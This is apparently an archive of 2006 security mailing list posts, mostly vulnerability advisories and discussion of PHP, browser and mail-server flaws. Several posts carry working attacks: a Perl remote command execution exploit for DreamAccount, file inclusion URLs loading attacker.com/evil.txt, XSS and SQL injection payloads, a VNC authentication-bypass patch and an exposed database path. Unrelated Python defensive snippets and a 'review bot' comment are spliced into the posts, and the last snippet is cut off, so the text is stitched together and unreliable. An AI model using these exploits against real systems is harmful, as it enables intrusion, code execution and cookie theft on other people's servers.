Re: Opera 9 DoS PoC

2006-06-23 Thread Bruno Lustosa

On 21 Jun 2006 03:39:09 -, [EMAIL PROTECTED] <[EMAIL PROTECTED]> wrote:

> Details:
> 
> Vulnerability can be exploited by using a large value in a href tag to create 
> an out-of-bounds memory access.
> 
> Proof Of Concept DoS exploit:
> 
> http://www.critical.lt/research/opera_die_happy.html


Interestingly enough, clicking on that link under Firefox 1.5.0.4 made
it hang for about 20 seconds, consuming 100% CPU time.
Probably not a vulnerability, although it could be "exploited" to annoy users.

--
Bruno Lustosa <[EMAIL PROTECTED]>
http://www.lustosa.net/


Re: PHP security (or the lack thereof)

2006-06-23 Thread Geo.

> I think that any ability of the (l)users to expose executables as web
> services threatens the security of the web server machine, irrespective of
> programming language.  (But I don't see how it threatens "the internet" --
> they can already connect their own misconfigured machine to the net
> directly)

If I compromise your home machine, I've got one computer. If I compromise
some webserver that hosts several hundred websites I've got a whole lot more
options via all those exploits that require I lure you to my website. I also
have whatever those websites are (suppose half of them are stores that
process credit cards).

Geo.



Re: Sendmail MIME DoS vulnerability

2006-06-23 Thread Gadi Evron
On Tue, 20 Jun 2006, Jain, Siddhartha wrote:
> Hi,
> 
> I am trying to understand how the below mentioned sendmail
> vulnerability. 
> http://www.sendmail.com/security/advisories/SA-200605-01.txt.asc
> 
> The description says that the DoS occurs when sendmail goes in a deeply
> nested malformed MIME message and uses the MIME 8-bit to 7-bit
> conversion function. Under what conditions would sendmail use the MIME
> 8-bit to 7-bit function? Only when the remote MTA doesn't understand
> 8-bit MIME, right?
> 
> That would mean that a malicious user would have to force the victim MTA
> to relay the malformed mail to a MIME 7-bit-only MTA for the attack to
> succeed. This probably means that open relays and ISP SMTP servers are
> more vulnerable than purely incoming SMTP servers.
> 
> I am just trying to make sense of the advisory and the possible threat
> of exploit.

I didn't understand at first either, as I attributed it to the DATA part
of the message. Apparently sendmail is smart enough to prevent the message
from not reaching the other side due to breakage using this. But I don't
get it completely yet.

Gadi.

> 
> 
> Thanks,
> 
> - Siddhartha
> 
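The kind of pre-delivery check a mail gateway could apply to the advisory's "deeply nested MIME" trigger, as an added example that is not part of the thread or of sendmail's own code: it measures multipart nesting depth with Python's stdlib parser and rejects anything above an assumed threshold (MAX_NESTING, the sample messages and the limit are constructed here, not taken from the advisory).

```python
import email
from email import policy
from email.message import EmailMessage

# Constructed policy threshold for this example: legitimate mail rarely nests more
# than a handful of multipart levels, so anything deeper is worth quarantining
# before it reaches an MTA that will walk the whole tree during 8-to-7-bit conversion.
MAX_NESTING = 8


def mime_depth(msg) -> int:
    """Deepest chain of multipart containers in msg (0 for a flat message)."""
    if not msg.is_multipart():
        return 0
    return 1 + max((mime_depth(part) for part in msg.get_payload()), default=0)


def check_message(raw: bytes, limit: int = MAX_NESTING):
    """Parse a raw RFC 2822 message and decide whether to accept it.

    Returns (depth, accepted, defect_count). The stdlib parser is tolerant of
    malformed input; everything it had to guess about lands in part.defects,
    a useful second signal for the "deeply nested *malformed*" case.
    """
    msg = email.message_from_bytes(raw, policy=policy.default)
    depth = mime_depth(msg)
    defects = sum(len(part.defects) for part in msg.walk())
    return depth, depth <= limit, defects


def build_nested(levels: int) -> bytes:
    """Constructed sample: `levels` multipart/mixed wrappers around one text part."""
    node = EmailMessage()
    node.set_content("leaf part")
    for _ in range(levels):
        wrapper = EmailMessage()
        wrapper.make_mixed()          # empty multipart/mixed container
        wrapper.attach(node)          # previous level becomes its only subpart
        node = wrapper
    node["From"] = "sender@example.invalid"
    node["To"] = "rcpt@example.invalid"
    node["Subject"] = "nesting test"
    return node.as_bytes()


if __name__ == "__main__":
    for n in (1, 4, 40):
        depth, accepted, defects = check_message(build_nested(n))
        print(f"levels={n} depth={depth} accepted={accepted} defects={defects}")
```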



[Kil13r-SA-20060622-2] Namo DeepSearch 4.5 Cross-Site Scripting Vulnerability

2006-06-23 Thread mac68k
Title:

[Kil13r-SA-20060622-2] Namo DeepSearch 4.5 Cross-Site Scripting Vulnerability


Author:

Kil13r - http://www.kil13r.info/


Local / Remote:

Remote


Timeline:

2006/06/21 - Discovery

2006/06/21 - Vendor notification

2006/06/21 - Vendor response

2006/06/22 - Release


Affected version:

Namo DeepSearch 4.5 or earlier


Not affected version:


Description:

Namo DeepSearch is a search engine solution, but it has a vulnerability.

An end user can run arbitrary JavaScript code in the search engine.


If the victim executes arbitrary JavaScript code, the attacker can steal the victim's cookie.


Edit the Namo DeepSearch HTML template as a workaround.


Proof of Concept code:

None


Proof of Concept example:

http://www.victim.com/cgi-bin/mclient.cgi?p=";>alert(String.fromCharCode(88,83,83,32,53580,49828,53944))


Proof of Concept screenshot:

http://www.kil13r.info/sa/xss/deepsearchxss.jpg


-

Igitur qui desiderat pacem, praeparet bellum.



Re: Bypassing of web filters by using ASCII

2006-06-23 Thread Thor (Hammer of God)

On 6/21/06 3:24 PM, "Paul" <[EMAIL PROTECTED]> spoketh to all:

>>> At
>>> 
>>> 
>>>   http://www.iku-ag.de/ASCII
>>> 
>>> 
>>> you can find a test page that displays a secret message. IE6 displays
>>> 
>>> the text correctly, Firefox 1.5 and Opera 8.5 display glibberish text.


Safari 2.0.3 also displays "glibberish text."

t




SYMSA-2006-005

2006-06-23 Thread research


Symantec Vulnerability Research


http://www.symantec.com/research

Security Advisory


Advisory ID   : SYMSA-2006-005

Advisory Title: Lanap CAPTCHA bypass exposure

Author: Michael White, [EMAIL PROTECTED] and

Graham Murphy, [EMAIL PROTECTED]

Release Date  : 23-06-2006

Application   : BotDetect Lanap CAPTCHA component

Platform  : ASP.NET

Severity  : Low/Limited exposure

Vendor status : Vendor verified, patch available

CVE Number: CVE-2006-2918

Reference : http://www.securityfocus.com/bid/18315



Overview:


The CAPTCHA component for ASP.NET provided by Lanap may be

completely bypassed, thus undermining the security benefit

of the CAPTCHA technology.



Details:


During a consulting engagement, Symantec identified that the

Lanap CAPTCHA component stores the UUID and hash for a given

CAPTCHA within the page ViewState. By replaying the ViewState

for a known number, a remote attacker may avoid the CAPTCHA

entirely.


This behaviour is dependent on the way in which the Lanap

component is integrated, however numerous examples including

Lanap's demo code are identified as exhibiting this behaviour.



Vendor Response:


The above vulnerability has been fixed in the latest release

of the product, BotDetect ASP.NET CAPTCHA 1.5.4.0.


Licensed and evaluation versions of Lanap BotDetect ASP.NET

CAPTCHA are available for customer download from the Lanap

website at http://www.lanapsoft.com


If there are any further questions about this statement, please

contact Lanap support.


Recommendation:


Upgrade to the latest release of the product,

BotDetect ASP.NET CAPTCHA 1.5.4.0.



Common Vulnerabilities and Exposures (CVE) Information:


The Common Vulnerabilities and Exposures (CVE) project has assigned

the following names to these issues.  These are candidates for

inclusion in the CVE list (http://cve.mitre.org), which standardizes

names for security problems.



  CVE-2006-2918


- - - - ---Symantec Vulnerability Research Advisory Information---


For questions about this advisory, or to report an error:

[EMAIL PROTECTED]


For details on Symantec's Vulnerability Reporting Policy:

http://www.symantec.com/research/Symantec-Responsible-Disclosure.pdf


Symantec Vulnerability Research Advisory Archive:

http://www.symantec.com/research/


Symantec Vulnerability Research GPG Key:

http://www.symantec.com/research/Symantec_Vulnerability_Research_GPG.asc


- - - - -Symantec Product Advisory Information-


To Report a Security Vulnerability in a Symantec Product:

[EMAIL PROTECTED]


For general information on Symantec's Product Vulnerability reporting and 
response:

http://www.symantec.com/security/


Symantec Product Advisory Archive:

http://www.symantec.com/avcenter/security/SymantecAdvisories.html


Symantec Product Advisory PGP Key:

http://www.symantec.com/security/Symantec-Vulnerability-Management-Key.asc


- - - - ---


Copyright (c) 2006 by Symantec Corp.

Permission to redistribute this alert electronically is granted

as long as it is not edited in any way unless authorized by

Symantec Consulting Services. Reprinting the whole or part of

this alert in any medium other than electronically requires

permission from [EMAIL PROTECTED]


Disclaimer

The information in the advisory is believed to be accurate

at the time of publishing based on currently available information.

Use of the information constitutes acceptance for use in an

AS IS condition. There are no warranties with regard to this

information.

Neither the author nor the publisher accepts any liability

for any direct, indirect, or consequential loss or damage

arising from use of, or reliance on, this information.


Symantec, Symantec products, and Symantec Consulting Services

are registered trademarks of Symantec Corp. and/or affiliated

companies in the United States and other countries. All other

registered and unregistered trademarks represented in this

document are the sole property of their respective

companies/owners.

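The replay problem the advisory describes, modelled as an added example that is neither Lanap's nor Symantec's code: the vulnerable form keeps the challenge id and a hash in state the client hands back (an HMAC is assumed here; the real component's hashing is not specified above), so one solved pair can be resubmitted indefinitely, while the hardened form keeps the answer server-side and consumes it on first use.

```python
import hashlib
import hmac
import secrets
import uuid


def new_answer(length: int = 5) -> str:
    """Random digit string standing in for the text rendered into the image."""
    return "".join(secrets.choice("0123456789") for _ in range(length))


class ViewStateCaptcha:
    """Models the vulnerable design: the server keeps nothing between requests.

    The challenge id and an HMAC over (id, answer) travel in page state and come
    back with the form, so verification is nothing more than a recomputation.
    """

    def __init__(self, key: bytes):
        self._key = key

    def _tag(self, challenge_id: str, answer: str) -> str:
        msg = f"{challenge_id}:{answer}".encode()
        return hmac.new(self._key, msg, hashlib.sha256).hexdigest()

    def issue(self):
        """Return (answer, state); normally the answer is only visible as an image."""
        challenge_id = str(uuid.uuid4())
        answer = new_answer()
        return answer, {"id": challenge_id, "tag": self._tag(challenge_id, answer)}

    def verify(self, state: dict, submitted: str) -> bool:
        # Unforgeable without the key, yet nothing stops the same (state, answer)
        # pair from being submitted again: there is no server-side record of use.
        return hmac.compare_digest(state["tag"], self._tag(state["id"], submitted))


class ServerSideCaptcha:
    """Hardened design: the answer lives only on the server and is single-use."""

    def __init__(self):
        self._pending = {}  # challenge id -> expected answer (add expiry in production)

    def issue(self):
        challenge_id = str(uuid.uuid4())
        answer = new_answer()
        self._pending[challenge_id] = answer
        return answer, challenge_id

    def verify(self, challenge_id: str, submitted: str) -> bool:
        # pop() makes the check one-shot: a replayed id finds nothing to compare against.
        expected = self._pending.pop(challenge_id, None)
        if expected is None:
            return False
        return hmac.compare_digest(expected, submitted)


def replay_demo():
    """Solve each CAPTCHA once legitimately, then resubmit the identical request."""
    weak = ViewStateCaptcha(secrets.token_bytes(32))
    answer, state = weak.issue()
    weak_results = (weak.verify(state, answer), weak.verify(state, answer))

    strong = ServerSideCaptcha()
    answer, cid = strong.issue()
    strong_results = (strong.verify(cid, answer), strong.verify(cid, answer))
    return weak_results, strong_results


if __name__ == "__main__":
    print("client-held state (first, replay):", replay_demo()[0])
    print("server-side state (first, replay):", replay_demo()[1])
```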



WBB<<---v2.3.1"report.php" SQL Injection

2006-06-23 Thread CrAzY . CrAcKeR


Discovered By: CrAzY CrAcKeR

Site:www.alshmokh.com

I want to thank my friend:-

nono225-mHOn-rageh-Lover Hacker-Brh

BoNy_m-Rootshill-LiNuX_rOOt-Sw33t h4ck3r




Example:-


/report.php?postid=[SQL]




Email: CrAzY.CrAcKeR(at)hotmail(dot)com


[ECHO_ADV_34$2006] W-Agora (Web-Agora) <= 4.2.0 (inc_dir) Remote File Inclusion

2006-06-23 Thread the_day
ECHO.OR.ID

ECHO_ADV_34$2006


---

[ECHO_ADV_34$2006] W-Agora (Web-Agora) <= 4.2.0 (inc_dir)  Remote File Inclusion

---


Author  : Dedi Dwianto a.k.a the_day

Date Found  : June, 20th 2006

Location: Indonesia, Jakarta

web : http://advisories.echo.or.id/adv/adv34-theday-2006.txt

Critical Lvl: Highly critical

Impact  : System access

Where   : From Remote

---


Affected software description:

~~

W-Agora (Web-Agora)


Application : W-Agora (Web-Agora)

version : <= 4.2.0

URL : http://w-agora.net

Description :


W-Agora (Web-Agora) is a database-driven communications system which allows you 
and your visitors to store and display messages, files, and other information on 
your web site. More than "just another Web BBS/forum software", W-Agora is 
designed so it can be easily customizable through a Web browser and the use of 
templates.

It can be used as a BBS, guestbook, download area, or publishing system. 

Several database backends are supported such as MySQL, Postgres, mSQL, Oracle 
and DBM.


---


Vulnerability:




---insert.php--



indexNotes();

}


?>

...

--


Input passed to the "inc_dir" parameter in insert.php is not properly verified 
before being used. This can be exploited to execute arbitrary PHP code by 
including files from local or external resources.


Affected files: 


admin_notes.php

admin_subscribed_user.php

admin_user.php

browse_avatar.php

close.php

create_forum.php

create_site.php

create_user.php

delete.php

delete_site.php

download_forum.php

editconf.php

edit_site.php

export.php

forgot_password.php

index.php

insert.php

search.php

view.php

update.php

setup.php

profile.php

register.php

rss.php

list.php

forgot_password.php

include/mail.php

include/fileupload.php

include/msql.php

include/dbaccess.php

include/form.php

include/postgres65.php

include/postgres.php

include/mysql.php

extras/quicklist.php

extras/shared_user.php

user/ldap_example.php

tools/upgrade_401.php

tools/upgrade_402.php

tools/upgrade_42.php

tools/upgrade_site_401.php

tools/upgrade_site_402.php


Successful exploitation requires that "register_globals= Off ".


Proof Of Concept:

~


http://target.com/[w-agora_path]/index.php?inc_dir=http://target.com//inject.txt?

http://target.com/[w-agora_path]/search.php?inc_dir=http://attacker.com/evil.txt?

http://target.com/[w-agora_path]/view.php?inc_dir=http://attacker.com/evil.txt?

http://target.com/[w-agora_path]/update.php?inc_dir=http://attacker.com/evil.txt?

http://target.com/[w-agora_path]/tools/upgrade_401.php?inc_dir=http://attacker.com/evil.txt?

http://target.com/[w-agora_path]/include/mail.php?inc_dir=http://attacker.com/evil.txt?

http://target.com/[w-agora_path]/extras/quicklist.php?inc_dir=http://attacker.com/evil.txt?

http://target.com/[w-agora_path]/register.php?inc_dir=http://attacker.com/evil.txt?

http://target.com/[w-agora_path]/rss.php?inc_dir=http://attacker.com/evil.txt?


and more Affected files



Solution:

~

Change register_globals= On 

in php.ini


---

Shoutz:

~~~


~ y3dips,moby,comex,z3r0byt3,K-159,c-a-s-e,S`to,lirva32,anonymous,kaiten

~ Lieur-Euy,Mr_ny3m,bithedz,an0maly

~ newbie_hacker[at]yahoogroups.com

~ #aikmel #e-c-h-o @irc.dal.net

---

Contact:




 the_day || echo|staff || the_day[at]echo[dot]or[dot]id

 Homepage: http://theday.echo.or.id/


 [ EOF ] --



Re: PHP security (or the lack thereof)

2006-06-23 Thread john mullee
--- Darren Reed <[EMAIL PROTECTED]> wrote:
> From my own mail archives, PHP appears to make up at least 4%
> of the email to bugtraq I see - or over 1000 issues since 1995,
> out of the 25,000 I have saved.
> 
> People complain about applications like sendmail...in the same
> period, it has been resopnsible for less than 200.
> 
> Do we have a new contender for worst security offender ever
> written ?

I guess most of the remaining offending apps were written in C: as much as 96%?!!
(including basically all of microsoft's stuff!!)

Surely the least secure language of all time !!!

Note also that no vulnerable apps were written in:
 - cobol, rpg3, prolog, ada, scheme, lisp, pl/1, occam, modula-2, or MIX

We're planning to roll out our next enterprise ecommerce grid as a set of
modula-2 plugins to cobol-based container controlled by a dynamic gridded
application matrix written in prolog, all running on highly parallel
lisp machines.

;)

john







Calendar ( Provided by Codewalkers ) - SQL Injection

2006-06-23 Thread Silitix
[P]roduct : Calendar 

Provided by Codewalkers


Official [S]ite : http://Calendar.codewalkers.com


[V]ulnerability : SQL Injection


[E]xploitation : /calendar.php?display=event&id=[SQL]


[C]redit : Silitix - www.Silitix.com


Original security [A]dvisory : www.Silitix.com/calendar-cws.php


[G]reetz : Simo64 / MSRT / VeNoM630 / CrAsH_oVeR_rIdE ... :)


Re: PHP security (or the lack thereof)

2006-06-23 Thread Crispin Cowan
[EMAIL PROTECTED] wrote:
> Trying to make the language 'safe' won't fix it because the language is not 
> the problem. The real problem is the way PHP is presented to most new 
> developers.
>
>
> PHP has been introduced as a tool for the web developer. As a language its 
> goal is "to allow web developers to write dynamically generated pages 
> quickly." (  http://www.php.net/manual/en/faq.general.php ). The focus then 
> is to enable the web developer by giving him the tools he needs to create 
> dynamic content, with as little hassle as possible. The web developer need 
> only read a short tutorial ( http://www.php.net/manual/en/tutorial.php ) and 
> he is ready to read, understand and implement the ideas presented in the 
> various example scripts on PHP.net. Unfortunately this situation leaves the 
> web developer uninformed and unprepared to face the hostile environment that 
> is the net.
>   
That is a fascinating perspective.

Web developers who work with static content (HTML and images, etc.) is
pretty secure: the security threat amounts to Apache configuration
(directory browsing and htpasswd stuff) and it is pretty difficult for
an attacker to corrupt static content by way of the content.

Dynamic content, while not inherently dangerous, becomes dangerous when
you hand the web developer a Turing-complete language. Suddenly the
exact behavior of the web site under arbitrary input becomes
undecidable. Programmers (mostly) know this. Security developers
(should) know this. Web artists may have just been introduced to
programming to get their web site to be dynamic.

There are two possible approaches to fixing this. One, as nabiy
suggests, is to change how PHP is presented to web developers. Label it
as a chain saw, and point out that chain saws don't know the difference
between "log" and "leg" :)

The other is to contrive a language that is both sufficient for dynamic
web content development, and also *not* Turing-complete. I have no idea
what such a language might look like, or even whether the intersection
of these two requirements is the null set.

For more on Turing completeness and security, consider coming to USENIX
Security 2006 and see my talk on this topic "Turing Around the Security
Problem" http://www.usenix.org/events/sec06/tech/#thurs

Crispin

-- 
Crispin Cowan, Ph.D.  http://crispincowan.com/~crispin/
Director of Software Engineering, Novell  http://novell.com



Re: Opera 9 DoS PoC

2006-06-23 Thread Darren Clarke

Tested and confirmed on Opera 9.00 build 8482.
Interesting this also managed to crash Notepad.exe on Windows XP SP2
Home Edition when viewing the source of the page in IE7 Beta 2.

Darren Clarke
IT / Comms Admin

-
Critical Security advisory #009 [http://www.critical.lt]
Advisory can be reached: http://www.critical.lt/?vuln/349

We are: N9, bigb0u, cybergoth, iglOo, mircia, Povilas
Shouts to Lithuanian girlz! and our friends ;]

Product: Opera 9 (8.x is immune to this)
Vuln type: Denial of Service
Risk: moderated
Attack type: Remote

Details:

Vulnerability can be exploited by using a large value in a href tag to
create an out-of-bounds memory access.

Proof Of Concept DoS exploit:
http://www.critical.lt/research/opera_die_happy.html

Research was originally done by Povilas Tumėnas a.k.a. N9

P.S. To Opera Team, we like your browser and want it to be as good as possible.


[KAPDA]MyBB1.1.3~Option update for code buttons~Sql Injection Admin Access

2006-06-23 Thread addmimistrator
ORIGINAL ADVISORY:

http://myimei.com/security/2006-06-21/mybb113option-update-for-code-buttonssql-injection-admin-access.html

http://www.kapda.ir/page-advisory.html


-----Summary----

Software: MyBB

Software's Web Site: http://www.mybboard.com

Versions: 1.1.3

Class: Remote

Status: Patched

Exploit: Available

Discovered by: imei addmimistrator

Risk Level: very high

-----Description---

There is a security bug in MyBB 1.1.3 software (latest version fully patched), 
file usercp.php, that allows an attacker to perform a SQL injection attack.


READ ORIGINAL ADVISORY FOR MORE DETAILS.


WBB<<---v1.2 "showmods.php" SQL Injection

2006-06-23 Thread CrAzY . CrAcKeR


Discovered By: CrAzY CrAcKeR

Site:www.alshmokh.com

I want to thank my friend:-

nono225-mHOn-rageh-Lover Hacker-Brh

BoNy_m-Rootshill-LiNuX_rOOt-Sw33t h4ck3r




Example:-


/showmods.php?boardid=[SQL]




Email: CrAzY.CrAcKeR(at)hotmail(dot)com


productcart soltan_defacer

2006-06-23 Thread soltan_defacer
 Azhteam Digital Security Team ##

## ##


# productcart   #


#   #


# Find by Soltan_defacer#

 

# Greetings; s.defacer - azhteam - lvl3hr - edi.programer   #


#   #


#   #


# ~~~   #


# Contact: [EMAIL PROTECTED] or http://www.azhteam.com   #


#   #


#

#   #

#   #

# in Google : /productcart/ #

#   #

# /ProductCart/ # 

# Urls: #

# http://www.site.com/ProductCart/  #

# exploit via link:  # 

# database/EIPC.mdb after /ProductCart/ #

# Urls xpl: http://www.site.com/ProductCart/database/EIPC.mdb   #

#   #

#




Re: Digital Armaments July-August Hacking Challange: Microsoft

2006-06-23 Thread Alexander Sotirov
[EMAIL PROTECTED] wrote:

> The 5000 credits prizes will be given on the publication of a official 
> Microsoft Bullettin with severity High regarding the vulnerability.

The Microsoft rating system does not have a "High" rating for severity. They
have Low, Medium, Important and Critical. See
http://www.microsoft.com/technet/security/bulletin/rating.mspx

Alex


rPSA-2006-0110-1 kernel

2006-06-23 Thread Justin M. Forbes
rPath Security Advisory: 2006-0110-1
Published: 2006-06-23
Products: rPath Linux 1
Rating: Severe
Exposure Level Classification:
Remote Deterministic Denial of Service
Updated Versions:
kernel=/[EMAIL PROTECTED]:devel//1/2.6.16.22-0.1-1

References:
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2445
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2448
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3085
http://issues.rpath.com/browse/RPL-457

Description:
In previous kernel versions, systems that use the SCTP protocol
are vulnerable to remote denial of service attacks including
remotely-triggered kernel crashes, and all systems are vulnerable
to local denial of service including locally-triggered kernel
hangs.

This update requires a reboot to implement the fixes.


Linux VNC evil client patch - BID 17978

2006-06-23 Thread embyte
Hi all,

I have made a patch for the current Linux VNC client (ver. 4.1.1), which permits 
authenticating to a bugged server with a NULL session, although password 
authentication is required 

(RealVNC Remote Authentication Bypass Vulnerability, BID 17978).


Here is the patch for file CConnection.cxx

$ cat vnc4-4.1.1+X4.3.0-NULL-Auth.patch

184,185c184,185

< // Inform the server of our decision

< if (secType != secTypeInvalid) {

---

> // Send to server NULL Auth [0x01] 

> if (secType=0x01) {
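Review bot: `if (secType=0x01)` assigns rather than compares, so the condition is always true and secType is silently overwritten with 1; if that is the intent (always answer with the NULL auth type the new comment names, whatever the server offered), put the assignment on its own line, e.g. `secType = 0x01; // force NULL auth` followed by the original `if (secType != secTypeInvalid) {`, so the next reader and the compiler's assignment-in-condition warning do not take it for a typo.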


Apply with

$ patch < vnc4-4.1.1+X4.3.0-NULL-Auth.patch

File to patch: vnc4-4.1.1+X4.3.0.orig/common/rfb/CConnection.cxx

patching file vnc4-4.1.1+X4.3.0.orig/common/rfb/CConnection.cxx


The original tarball is named vnc4_4.1.1+X4.3.0.orig.tar.gz:

http://ftp.debian.org/debian/pool/main/v/vnc4/vnc4_4.1.1+X4.3.0.orig.tar.gz


Have a nice day

embyte


[Kil13r-SA-20060622-1] NetSoft SmartNet 2.0 Cross-Site Scripting Vulnerability

2006-06-23 Thread mac68k
Title:

[Kil13r-SA-20060622-1] NetSoft SmartNet 2.0 Cross-Site Scripting Vulnerability


Author:

Kil13r - http://www.kil13r.info/


Local / Remote:

Remote


Timeline:

2006/06/21 - Discovery

2006/06/21 - Vendor notification

2006/06/22 - Release


Affected version:

NetSoft SmartNet 2.0


Not affected version:


Description:

NetSoft SmartNet 2.0 is a search engine solution, but it has a vulnerability.

An end user can run arbitrary JavaScript code in the search engine.


If the victim executes arbitrary JavaScript code, the attacker can steal the victim's cookie.


Proof of Concept code:

None


Proof of Concept example:

http://www.victim.com/dataCollector/search.jsp?searchFLD=0&tableName=_meta&keyWord=alert("XSS")

http://www.victim.com/dataCollector/search.asp?searchFLD=0&tableName=_meta&keyWord=alert("XSS")


Proof of Concept screenshot:

http://www.kil13r.info/sa/xss/smartnetxss.jpg


-

Igitur qui desiderat pacem, praeparet bellum.



DREAMACCOUNT V3.1 Remote Command Execution Exploit

2006-06-23 Thread KARKOR23


DREAMACCOUNT V3.1 Command Execution Exploit 



Discovered By CrAsh_oVeR_rIdE(Arabian Security Team)

Coded By Drago84(Exclusive Security Team)   



site of script:http://dreamcost.com 



Vulnerable: DREAMACCOUNT V3.1   



vulnerable file :

--  

/admin/index.php



vulnerable code:



require($path . "setup.php");   

require($path . "functions.php");   

require($path . "payment_processing.inc.php");

$path parameter File inclusion  



#!/usr/bin/perl
use strict;
use warnings;
use HTTP::Request;
use LWP::UserAgent;

print "\n=\r\n";
print " * Dreamaccount Remote Command Execution  23/06/06 *\r\n";
print "=\r\n";
print "[*] dork:\"powered by DreamAccount 3.1\"\n";
print "[*] Coded By : Drago84 \n";
print "[*] Discovered by CrAsH_oVeR_rIdE\n";
print "[*] Use\n";
print " Into the Eval Site it must be:\n\n";
print " Exclusive  /Exclusive";

if (@ARGV < 4)
{
print "\n\n[*] usage: perl dream.pl\n";
print "[*] usage: perl dream.pl www.HosT.com /dreamaccount/ http://www.site.org/doc.jpg id\n";
print "[*] uid=90(nobody) gid=90(nobody) egid=90(nobody) \n";
exit();
}

my $host=$ARGV[0];
my $dir=$ARGV[1];
my $eval=$ARGV[2];
my $cmd=$ARGV[3];
# The file named in $eval is pulled in through the unchecked $path include in /admin/index.php
my $url2=$host.$dir."/admin/index.php?path=".$eval."?&cmd=".$cmd;
print "\n";

my $req=HTTP::Request->new(GET=>$url2);
my $ua=LWP::UserAgent->new();
$ua->timeout(10);
my $response=$ua->request($req);

if ($response->is_success) {
print "\n\nResult of:".$cmd."\n";
# Keep only the text between the Exclusive / /Exclusive markers in the response
my ($pezzo_utile) = ( $response->content =~ m{Exclusive(.+)\/Exclusive}smx );
print $pezzo_utile if defined $pezzo_utile;
print "\n";
}



Discovered By CrAsh_oVeR_rIdE

Coded By  Drago84

E-mail:[EMAIL PROTECTED]

Site:www.lezr.com

Greetz:KING-HACKER,YOUNG_HACKER

,SIMO,ROOT-HACKED,SAUDI,QPTAN,POWERWALL,SNIPER_SA,Black-Code,ALMOKAN3,Mr.hcR 
AND ALL LEZR.COM Member



[ GLSA 200606-24 ] wv2: Integer overflow

2006-06-23 Thread Stefan Cornelius
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200606-24
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
 Title: wv2: Integer overflow
  Date: June 23, 2006
  Bugs: #136759
ID: 200606-24

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

An integer overflow could allow an attacker to execute arbitrary code.

Background
==

wv2 is a filter library for Microsoft Word files, used in many Office
suites.

Affected packages
=

---
 Package   /  Vulnerable  / Unaffected
---
  1  app-text/wv2   < 0.2.3   >= 0.2.3

Description
===

A boundary checking error was found in wv2, which could lead to an
integer overflow.

Impact
==

An attacker could execute arbitrary code with the rights of the user
running the program that uses the library via a maliciously crafted
Microsoft Word document.

Workaround
==

There is no known workaround at this time.

Resolution
==

All wv2 users should update to the latest stable version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=app-text/wv2-0.2.3"

References
==

  [ 1 ] CVE 2006-2197
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2197

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200606-24.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
===

Copyright 2006 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5




Re: Re: PHP security (or the lack thereof)

2006-06-23 Thread nabiy
Trying to make the language 'safe' won't fix it because the language is not the 
problem. The real problem is the way PHP is presented to most new developers.


PHP has been introduced as a tool for the web developer. As a language its goal 
is "to allow web developers to write dynamically generated pages quickly." (  
http://www.php.net/manual/en/faq.general.php ). The focus then is to enable the 
web developer by giving him the tools he needs to create dynamic content, with 
as little hassle as possible. The web developer need only read a short tutorial 
( http://www.php.net/manual/en/tutorial.php ) and he is ready to read, 
understand and implement the ideas presented in the various example scripts on 
PHP.net. Unfortunately this situation leaves the web developer uninformed and 
unprepared to face the hostile environment that is the net.


the only real solution is to change the way the language is presented to new 
developers. It must be presented in a manner that increases the awareness of 
the developer so that he able to deploy his application in a safe manner. This 
means that security needs to be taught from the beginning rather than as a 
footnote, especially on sites where authoritative teaching is given ( such as 
PHP.net ). - nabiy


Re: Bypassing of web filters by using ASCII

2006-06-23 Thread Amit Klein (AKsecurity)
On 23 Jun 2006 at 10:35, Vincent Archer wrote:

> On Fri, Jun 23, 2006 at 12:08:56AM +0200, Amit Klein (AKsecurity) wrote:
> > So what I don't understand now is why IE's "solution" is any better than 
> > Opera/Firefox?
> > 
> > Why is modifying the data (msb) any better than modifying the 
> > data-description (charset)?
> 
> The same problem did exist in RFC821, which specified the data path as
> being 7-bit, with the MSB set to 0. The venerable ancestor sendmail did
> enforce that, by and-ing each and every byte with 0x7F, which means that
> the IE solution is "slightly better", due to historical precedent.
> 

If we're into precedences, does anyone know what Mosaic 1.0 used to do in such a 
case? After all, it was probably the first widely used browser (see 
http://www.livinginternet.com/w/wi_browse.htm), and it made some sense (in the 
early 90s) to conform to its de-facto browser standard.

> Not that it's good anyway.
>

Yep...

-Amit
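An added example, not code from the thread or from the linked test page: a content filter that only matches raw bytes misses text whose high bit is set, while one that also inspects the 7-bit-masked form (the `& 0x7F` treatment Vincent attributes to old sendmail, and what IE6 effectively displayed) catches it. The token list and the sample bytes are constructed for the example.

```python
# Constructed token list; a real filter would carry a much fuller set.
BLOCKED_TOKENS = (b"<script", b"javascript:")


def strip_msb(data: bytes) -> bytes:
    """Clear bit 7 of every byte: the `& 0x7F` normalisation the thread describes."""
    return bytes(b & 0x7F for b in data)


def set_msb(data: bytes) -> bytes:
    """Constructed sample generator: the high-bit form of ASCII text, i.e. the
    kind of content the test page in the thread serves."""
    return bytes(b | 0x80 for b in data)


def naive_filter(data: bytes) -> bool:
    """Matches on the raw bytes only, as a filter that ignores how clients
    normalise input would."""
    lowered = data.lower()          # bytes.lower() only touches ASCII letters
    return any(tok in lowered for tok in BLOCKED_TOKENS)


def normalising_filter(data: bytes) -> bool:
    """Inspect every form a downstream client might render: raw and 7-bit-masked.
    The rule is to normalise the way the consumer does before matching."""
    return naive_filter(data) or naive_filter(strip_msb(data))


def render_as_client(data: bytes, client: str) -> str:
    """Approximate what each browser named in the thread shows for the same bytes."""
    if client == "ie6":
        return strip_msb(data).decode("ascii")   # MSB ignored: readable text
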